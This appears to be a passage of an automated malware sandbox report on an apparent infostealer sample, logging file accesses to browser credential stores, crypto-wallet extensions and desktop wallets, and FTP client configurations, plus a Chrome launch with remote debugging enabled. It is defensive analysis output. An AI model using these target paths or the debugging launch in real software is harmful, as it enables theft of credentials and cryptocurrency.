Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior

Remote Access Functionality

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 6.2.AddInProcess32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.AddInProcess32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2612742813.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2627741539.00000000046FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MasterKeyX_Pro_v4.3.exe PID: 7296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 8096, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs